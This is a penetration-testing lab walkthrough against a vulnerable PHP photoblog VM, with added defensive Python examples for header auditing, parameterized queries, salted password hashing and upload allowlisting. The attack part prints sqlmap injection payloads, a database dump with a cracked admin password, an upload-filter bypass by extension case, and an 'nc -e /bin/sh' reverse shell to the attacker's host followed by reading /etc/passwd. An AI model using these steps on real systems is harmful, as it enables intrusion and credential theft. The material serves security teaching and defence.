• Penetration testing lab environment
    • Attacker: OS [ Kali Linux ]
    • Victim: IP [ 192.168.75.132 ]
  • 1. Information gathering
    root@kali:~# nikto -host 192.168.75.132
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.75.132
    + Target Hostname:    192.168.75.132
    + Target Port:        80
    + Start Time:         2018-09-09 09:25:36 (GMT9)
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.16 (Debian)
    + Retrieved x-powered-by header: PHP/5.3.3-7+squeeze14
    
    
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    Security-related response headers are not set.
    + OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.0.1/images/".
    + Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
    Apache and the other server components are outdated versions.
    + Uncommon header 'tcn' found, with contents: list
    + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
    + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
    + Cookie PHPSESSID created without the httponly flag
    + OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
    + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
    + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
    + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
    + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
    + OSVDB-3268: /icons/: Directory indexing found.
    + OSVDB-3268: /images/: Directory indexing found.
    + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
    Directory indexing was found under the /icons/ and /images/ paths.
    + Server leaks inodes via ETags, header found with file /icons/README, inode: 3440, size: 5108, mtime: Tue Aug 28 19:48:10 2007
    + OSVDB-3233: /icons/README: Apache default file found.
    + /admin/login.php: Admin login page/section found.
    A PHP login page and admin section were found.
    + 8348 requests: 0 error(s) and 21 item(s) reported on remote host
    + End Time:           2018-09-09 09:25:56 (GMT9) (20 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    root@kali:~#
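    The header findings in the scan above (X-Frame-Options, X-XSS-Protection and X-Content-Type-Options absent, PHPSESSID set without HttpOnly, version strings in Server and X-Powered-By) can be re-checked on every deployment without re-running nikto. The Python below is an added example and not part of the original write-up: the two response blocks it audits are constructed, with only the Server and X-Powered-By values copied from the scan output, and the hardened block shows what the same response should look like.

```python
"""Audit a raw HTTP response for the hardening gaps nikto reported on the lab host.

Added example (not part of the original write-up). Both response blocks are
constructed; the Server and X-Powered-By values copy what the scan reported,
everything else is assumed.
"""
from typing import List, Tuple

# Constructed: a response shaped like the lab server's (values from the nikto scan).
LAB_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.16 (Debian)\r\n"
    "X-Powered-By: PHP/5.3.3-7+squeeze14\r\n"
    "Set-Cookie: PHPSESSID=0123456789abcdef0123456789abcdef; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

# Constructed: the same response after the usual Apache/PHP hardening.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: PHPSESSID=0123456789abcdef0123456789abcdef; path=/; HttpOnly\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

# The three headers nikto flagged as absent.
REQUIRED_HEADERS = ("x-frame-options", "x-content-type-options", "x-xss-protection")


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Split the header section of a raw response into (name, value) pairs.

    Names are lower-cased because header names are case-insensitive; the
    status line and the body after the blank line are ignored.
    """
    head, _, _body = raw.partition("\r\n\r\n")
    pairs = []
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs


def audit_response(raw: str) -> List[str]:
    """Return one finding string per weakness; an empty list means clean."""
    headers = parse_headers(raw)
    present = {name for name, _ in headers}
    findings = []
    for required in REQUIRED_HEADERS:
        if required not in present:
            findings.append(f"missing header: {required}")
    for name, value in headers:
        if name == "set-cookie":
            cookie_name = value.split("=", 1)[0].strip()
            attrs = {a.strip().lower() for a in value.split(";")[1:]}
            if "httponly" not in attrs:
                findings.append(f"cookie {cookie_name} set without HttpOnly")
        elif name in ("server", "x-powered-by") and any(c.isdigit() for c in value):
            # a digit in these headers almost always means a version string
            findings.append(f"version disclosure in {name}: {value}")
    return findings


if __name__ == "__main__":
    for label, resp in (("lab", LAB_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(resp) or "no findings")
```

    On the Apache/PHP side the corresponding fixes are the mod_headers directives (`Header always set X-Frame-Options "DENY"` and the two sibling headers), `ServerTokens Prod` for the Server banner, and `expose_php = Off` plus `session.cookie_httponly = 1` in php.ini.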
  • Web application mapping
    1. Launch Burp Suite.
    2. Configure the web browser so that its requests pass through the Burp Suite proxy.
    3. Click through each menu of the web application and collect information such as the URL structure.
  • SQL injection
    1. While clicking each menu and checking the URL, noticed ?id=1 at the end of the address when clicking the test menu.
    2. Appended a ' after the 1 and sent the request.
    3. After seeing the error, judged it highly likely that a vulnerability exists.
    4. Attempted to obtain information about the page with sqlmap.
    5. root@kali:~# sqlmap -u "http://192.168.75.132/cat.php?id=1"
    6. ___
      __H__
      ___ ___[.]_____ ___ ___  {1.2.8#stable}
      |_ -| . [,]     | .'| . |
      |___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
      
      [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
      
      [*] starting at 09:49:31
      
      [09:49:32] [INFO] testing connection to the target URL
      [09:49:32] [INFO] heuristics detected web page charset 'ascii'
      [09:49:32] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
      [09:49:32] [INFO] testing if the target URL content is stable
      [09:49:33] [INFO] target URL content is stable
      [09:49:33] [INFO] testing if GET parameter 'id' is dynamic
      [09:49:33] [INFO] confirming that GET parameter 'id' is dynamic
      [09:49:33] [INFO] GET parameter 'id' is dynamic
      [09:49:33] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
      [09:49:33] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
      [09:49:33] [INFO] testing for SQL injection on GET parameter 'id'
      it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
      for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
      [09:50:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
      [09:50:59] [WARNING] reflective value(s) found and filtering out
      [09:50:59] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Ruby")
      [09:50:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
      [09:50:59] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
      [09:50:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
      [09:50:59] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
      [09:50:59] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
      [09:50:59] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
      [09:50:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
      [09:50:59] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
      [09:50:59] [INFO] testing 'MySQL inline queries'
      [09:50:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
      [09:50:59] [WARNING] time-based comparison requires larger statistical model, please wait.............  (done)                            
      [09:50:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'
      [09:50:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
      [09:50:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
      [09:50:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
      [09:50:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
      [09:50:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
      [09:51:19] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable 
      [09:51:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
      [09:51:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
      [09:51:20] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
      [09:51:20] [INFO] target URL appears to have 4 columns in query
      [09:51:20] [INFO] target URL appears to be UNION injectable with 4 columns
      [09:51:20] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
      [09:51:20] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
      GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
      sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
      ---
      Parameter: id (GET)
      Type: boolean-based blind
      Title: AND boolean-based blind - WHERE or HAVING clause
      Payload: id=1 AND 8628=8628
      
      Type: error-based
      Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
      Payload: id=1 AND (SELECT 3376 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(3376=3376,1))),0x7178627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
      
      Type: AND/OR time-based blind
      Title: MySQL >= 5.0.12 AND time-based blind
      Payload: id=1 AND SLEEP(5)
      
      Type: UNION query
      Title: Generic UNION query (NULL) - 4 columns
      Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x717a6a7671,0x4156577642507159497973426d46456a6877524d764a4c52684d75656745736d69775a7a50467772,0x7178627171),NULL,NULL-- qnSc
      ---
      [09:51:23] [INFO] the back-end DBMS is MySQL
      web server operating system: Linux Debian 6.0 (squeeze)
      web application technology: PHP 5.3.3, Apache 2.2.16
      back-end DBMS: MySQL >= 5.0
      [09:51:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.75.132'
      
      [*] shutting down at 09:51:23 

    7. Find out the name of the current database.
    8. root@kali:~# sqlmap -u "http://192.168.75.132/cat.php?id=1" --current-db
      (omitted...)
      [09:57:03] [INFO] fetching current database
      current database:    'photoblog'
      [09:57:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.75.132'
      
      [*] shutting down at 09:57:03

    9. Attempt to dump the contents of the DB.
    10. root@kali:~# sqlmap -u "http://192.168.75.132/cat.php?id=1" -D photoblog --dump
      (omitted...)
      [10:01:31] [INFO] fetching tables for database: 'photoblog'
      [10:01:31] [INFO] fetching columns for table 'pictures' in database 'photoblog'
      [10:01:31] [INFO] fetching entries for table 'pictures' in database 'photoblog'
      Database: photoblog
      Table: pictures
      [3 entries]
      +----+-------------+-----+---------+
      | id | img         | cat | title   |
      +----+-------------+-----+---------+
      | 1  | hacker.png  | 2   | Hacker  |
      | 2  | ruby.jpg    | 1   | Ruby    |
      | 3  | cthulhu.png | 1   | Cthulhu |
      +----+-------------+-----+---------+
      
      [10:01:31] [INFO] table 'photoblog.pictures' dumped to CSV file '/root/.sqlmap/output/192.168.75.132/dump/photoblog/pictures.csv'
      [10:01:31] [INFO] fetching columns for table 'users' in database 'photoblog'
      [10:01:31] [INFO] fetching entries for table 'users' in database 'photoblog'
      [10:01:31] [INFO] recognized possible password hashes in column 'password'
      do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
      do you want to crack them via a dictionary-based attack? [Y/n/q] 
      [10:01:45] [INFO] using hash method 'md5_generic_passwd'
      what dictionary do you want to use?
      [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
      [2] custom dictionary file
      [3] file with list of dictionary files
      > 
      [10:01:46] [INFO] using default dictionary
      do you want to use common password suffixes? (slow!) [y/N] 
      [10:01:47] [INFO] starting dictionary-based cracking (md5_generic_passwd)
      [10:01:47] [WARNING] multiprocessing hash cracking is currently not supported on this platform
      [10:02:09] [INFO] cracked password 'P4ssw0rd' for user 'admin'                                                                            
      Database: photoblog                                                                                                                       
      Table: users
      [1 entry]
      +----+-------+---------------------------------------------+
      | id | login | password                                    |
      +----+-------+---------------------------------------------+
      | 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
      +----+-------+---------------------------------------------+
      (omitted...)
    11. Log in to the admin page with the obtained administrator credentials.
    12. Attempt a file upload attack against the New picture page, which allows uploads.
      1. Enter the file name in title, click the Browse button and select the webshell.php file.
      2. On the first attempt an error occurred with the message NO PHP!!, suggesting that PHP file uploads are blocked.
      3. Renamed the extension to uppercase with mv webshell.php webshell.PHP and retried; the upload succeeded.
      4. Returned to the Home menu and used view source to find the path of the uploaded file.
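    The sqlmap run above shows that whatever is sent in ?id= reaches the query unchanged, which is the whole defect. As an added example (not the lab application's code, whose source the page never shows), the following Python rebuilds the photoblog 'pictures' table as it was dumped in step 10 and runs the inputs from steps 2 and 6 through a concatenating lookup and a parameterized one. That ?id= filters on the 'cat' column, and the shape of the query, are assumptions.

```python
"""Vulnerable vs. parameterized lookup behind a cat.php?id=... style page.

Added example, not code from the lab application (the page never shows
cat.php's source). It rebuilds the photoblog 'pictures' table exactly as
sqlmap dumped it in an in-memory SQLite database; that ?id= selects rows by
the 'cat' column, and the query shape, are assumptions.
"""
import sqlite3
from typing import Dict, List, Tuple

# Rows as dumped by sqlmap on this page: (id, img, cat, title).
PICTURES = [
    (1, "hacker.png", 2, "Hacker"),
    (2, "ruby.jpg", 1, "Ruby"),
    (3, "cthulhu.png", 1, "Cthulhu"),
]


def make_db() -> sqlite3.Connection:
    """Build the in-memory table the two lookups below run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pictures (id INTEGER, img TEXT, cat INTEGER, title TEXT)")
    conn.executemany("INSERT INTO pictures VALUES (?, ?, ?, ?)", PICTURES)
    return conn


def pictures_vulnerable(conn: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """String concatenation: whatever arrives in ?id= becomes part of the SQL.

    This is the defect class sqlmap reported for GET parameter 'id'.
    """
    sql = "SELECT id, img, title FROM pictures WHERE cat = " + id_param
    return conn.execute(sql).fetchall()


def pictures_safe(conn: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """Type-check the input, then bind it: the value can never alter the query."""
    try:
        cat = int(id_param)
    except ValueError:
        return []  # a real handler would answer 400 Bad Request here
    sql = "SELECT id, img, title FROM pictures WHERE cat = ?"
    return conn.execute(sql, (cat,)).fetchall()


def sqli_demo() -> Dict[str, object]:
    """Run the inputs from the write-up through both lookups and collect the results."""
    conn = make_db()
    out: Dict[str, object] = {}
    # the legitimate request: ?id=1
    out["normal_vuln"] = pictures_vulnerable(conn, "1")
    out["normal_safe"] = pictures_safe(conn, "1")
    # step 2 of the write-up: a trailing quote breaks the concatenated statement
    try:
        pictures_vulnerable(conn, "1'")
        out["quote_vuln"] = "no error"
    except sqlite3.OperationalError as exc:
        out["quote_vuln"] = f"error: {exc}"
    out["quote_safe"] = pictures_safe(conn, "1'")
    # the boolean-based blind payload sqlmap listed (id=1 AND 8628=8628) and its
    # false counterpart: the page differs with the truth value only when concatenated
    out["bool_true_vuln"] = pictures_vulnerable(conn, "1 AND 8628=8628")
    out["bool_false_vuln"] = pictures_vulnerable(conn, "1 AND 8628=8629")
    out["bool_true_safe"] = pictures_safe(conn, "1 AND 8628=8628")
    out["bool_false_safe"] = pictures_safe(conn, "1 AND 8628=8629")
    return out


if __name__ == "__main__":
    for key, value in sqli_demo().items():
        print(f"{key:16} {value}")
```

    The visible difference between the two boolean payloads under the concatenating lookup is exactly what sqlmap's "boolean-based blind" technique measures; under the bound query both inputs fail the integer check and the query text never changes.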
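    The users dump in step 10 was crackable because the application stored a bare, unsalted MD5 of each password, so sqlmap's dictionary matched the admin entry in about twenty seconds. The Python below is an added example, not code from the lab application: it shows the 32-hex-character heuristic behind sqlmap's "recognized possible password hashes", why a wordlist against unsalted MD5 costs nothing, and a salted PBKDF2 store with constant-time verification in its place. The wordlist is a constructed four-entry stand-in, the MD5 is recomputed rather than copied from the dump, and the iteration count is a choice rather than a value from the page.

```python
"""Why the dumped 'users' row cracked in seconds, and how to store passwords instead.

Added example, not code from the lab application. The stored value is the
unsalted MD5 that sqlmap's wordlist matched to 'P4ssw0rd' on this page
(recomputed here rather than copied); WORDLIST is a constructed stand-in for
sqlmap's dictionary; the PBKDF2 parameters are a choice, not page values.
"""
import hashlib
import hmac
import re
import secrets
from typing import Iterable, List, Optional, Tuple

WORDLIST = ["123456", "password", "P4ssw0rd", "letmein"]  # constructed
PBKDF2_ITERATIONS = 200_000  # deliberately slow; size to your hardware budget

# What the lab's users table held for 'admin': a bare MD5 of the password.
RECOMPUTED_MD5 = hashlib.md5(b"P4ssw0rd").hexdigest()


def looks_like_unsalted_md5(stored: str) -> bool:
    """The heuristic behind sqlmap's 'recognized possible password hashes': 32 hex chars."""
    return re.fullmatch(r"[0-9a-f]{32}", stored) is not None


def crack_md5_with_wordlist(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """One cheap MD5 per guess and no salt: this is all sqlmap had to do."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == stored:
            return word
    return None


def hash_password(password: str) -> str:
    """Salted PBKDF2-HMAC-SHA256, serialised as algo$iterations$salt$digest."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iterations))
    except ValueError:  # wrong field count, bad hex or non-numeric iterations
        return False
    return hmac.compare_digest(digest.hex(), digest_hex)


def audit_password_column(rows: Iterable[Tuple[int, str, str]]) -> List[str]:
    """Logins whose stored value is a bare MD5 and must be rehashed at next login."""
    return [login for _id, login, stored in rows if looks_like_unsalted_md5(stored)]


if __name__ == "__main__":
    print("md5 wordlist hit:", crack_md5_with_wordlist(RECOMPUTED_MD5, WORDLIST))
    stored = hash_password("P4ssw0rd")
    print("pbkdf2 verify:", verify_password("P4ssw0rd", stored))
    print("needs rehash:", audit_password_column([(1, "admin", RECOMPUTED_MD5), (2, "bob", stored)]))
```

    A salted slow hash does not make a weak password strong, but it removes the shortcut the dump offered: every guess must be recomputed per user with its own salt, and the 32-hex-character pattern that let sqlmap identify the column no longer appears.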
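    The bypass in step 12 worked because the upload filter compared the extension case-sensitively against "php" while the server still executed the renamed webshell.PHP, as the reverse shell that follows shows. The Python below is an added example, not the lab application's code: weak_check() is a reconstruction that reproduces only the behaviour visible on the page, and strong_check() shows the allowlist-plus-content-sniffing form that closes it. The allowed types, the magic-number table and the server-generated storage name are assumptions.

```python
"""Extension blocklist vs. allowlist for the 'New picture' upload form.

Added example, not the lab application's code: the page shows only the
'NO PHP!!' response and that renaming to .PHP got through, so weak_check()
is a reconstruction reproducing exactly that behaviour. The allowed types
and the magic-number table in strong_check() are assumptions.
"""
import os
import secrets
from typing import Optional

ALLOWED_IMAGE_EXT = {"png", "jpg", "jpeg", "gif"}

# First bytes of the allowed formats (assumed subset of the full signature list).
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def weak_check(filename: str) -> bool:
    """Reconstructed blocklist: a case-sensitive '.php' test, so 'webshell.PHP' passes."""
    return not filename.endswith(".php")


def sniff_image_type(content: bytes) -> Optional[str]:
    """Return the image type the bytes actually are, ignoring the file name."""
    for magic, kind in MAGIC.items():
        if content.startswith(magic):
            return kind
    return None


def strong_check(filename: str, content: bytes) -> bool:
    """Allowlist on a normalised extension, exactly one dot, and matching content."""
    base = os.path.basename(filename)
    if base.count(".") != 1:  # rejects 'shell.php.png' and bare names
        return False
    root, ext = base.split(".")
    if not root:  # rejects '.png'
        return False
    ext = ext.lower()  # the case-folding the lab filter was missing
    if ext not in ALLOWED_IMAGE_EXT:
        return False
    if ext == "jpeg":
        ext = "jpg"
    return sniff_image_type(content) == ext


def stored_name(filename: str, content: bytes) -> Optional[str]:
    """Name to store under: server-generated, so the user's name never reaches disk."""
    if not strong_check(filename, content):
        return None
    kind = sniff_image_type(content)
    return f"{secrets.token_hex(16)}.{kind}"


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + bytes(8)
    print("weak  webshell.PHP:", weak_check("webshell.PHP"))
    print("strong webshell.PHP:", strong_check("webshell.PHP", b"<?php echo 1; ?>"))
    print("strong ruby.png    :", strong_check("ruby.png", png), stored_name("ruby.png", png))
```

    Validation of the name and bytes is only half of it; the upload directory should also be served without a script handler (or from outside the web root), so that even a file that slips through is never executed.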
  • Reverse shell penetration
    1. In the terminal, start nc listening on port 4000

      nc -lvnp 4000

    2. Enter the following nc command in the webshell form so that the victim connects to the listening port (the address and port are the attacker's, as the listener output below reports)

      nc 192.168.75.130 4000 -e /bin/sh

    3. After confirming in the terminal that the connection was made, obtained a shell and completed the penetration

    root@kali:~# nc -lvnp 4000
    listening on [any] 4000 ...
    connect to [192.168.75.130] from (UNKNOWN) [192.168.75.132] 53003
    id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    uname -a
    Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linux
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
    sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
    user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash